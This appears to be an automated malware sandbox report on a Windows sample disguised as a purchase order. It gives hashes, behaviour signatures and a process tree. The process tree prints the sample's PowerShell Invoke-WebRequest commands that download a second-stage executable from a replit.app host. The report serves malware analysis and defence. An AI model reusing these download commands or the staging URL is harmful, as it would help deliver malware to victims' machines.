Analysis
- max time kernel: 14s
- max time network: 23s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 29-07-2024 07:35
Static task: static1
Behavioral task: behavioral1
- Sample: jdconstructnOrderfdp..exe
- Resource: win7-20240705-en
Behavioral task: behavioral2
- Sample: jdconstructnOrderfdp..exe
- Resource: win10v2004-20240709-en
General
- Target: jdconstructnOrderfdp..exe
- Size: 288KB
- MD5: 7e900eb50f9dc1cb5c68ffea4b9e7bcc
- SHA1: 4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
- SHA256: 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
- SHA512: a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
- SSDEEP: 3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Signatures
Processes:
- pid 2776: powershell.exe
- pid 1056: powershell.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (process: jdconstructnOrderfdp..exe)
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
- pid 1056: powershell.exe
- pid 2776: powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes:
- Token: SeDebugPrivilege, pid 1056, powershell.exe
- Token: SeDebugPrivilege, pid 2776, powershell.exe
Suspicious use of WriteProcessMemory (10 IoCs)
Processes (description, pid, process, target process):
- PID 448 wrote to memory of 1884: 448, jdconstructnOrderfdp..exe, cmd.exe
- PID 448 wrote to memory of 1884: 448, jdconstructnOrderfdp..exe, cmd.exe
- PID 448 wrote to memory of 1884: 448, jdconstructnOrderfdp..exe, cmd.exe
- PID 448 wrote to memory of 1884: 448, jdconstructnOrderfdp..exe, cmd.exe
- PID 1884 wrote to memory of 1056: 1884, cmd.exe, powershell.exe
- PID 1884 wrote to memory of 1056: 1884, cmd.exe, powershell.exe
- PID 1884 wrote to memory of 1056: 1884, cmd.exe, powershell.exe
- PID 1884 wrote to memory of 2776: 1884, cmd.exe, powershell.exe
- PID 1884 wrote to memory of 2776: 1884, cmd.exe, powershell.exe
- PID 1884 wrote to memory of 2776: 1884, cmd.exe, powershell.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 448
  - C:\Windows\system32\cmd.exe (depth 2)
    Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FD33.tmp\FD34.tmp\FD35.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"
    - Suspicious use of WriteProcessMemory
    PID: 1884
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1056
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: Powershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2776
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 334B
  MD5: 9aaac0122442ca0ebb4d8bb795e86676
  SHA1: 594744d8e4d51273dd435c3fac5799bc5f180e8c
  SHA256: 6af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
  SHA512: d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TLHZCW1YK4EQO8YFTMQ0.temp
  Filesize: 7KB
  MD5: 6e841bff0316c7155ddb5f1831b5c7d1
  SHA1: 64fbf22b57116c43cb8bd09a2ec6de8008ba91e4
  SHA256: 56b0abbab4702baf6a30d4925ad33520040dc402e218dfcccbd4324eb41efa9a
  SHA512: 41511444e34559bfda88f4c6f321d0b3ff26c829571c263c6430dfe0f3f9c3ff2089c026c9f9751203e207a9a41a23c6cb19c08c2e49aa870d4d0ccb8519b538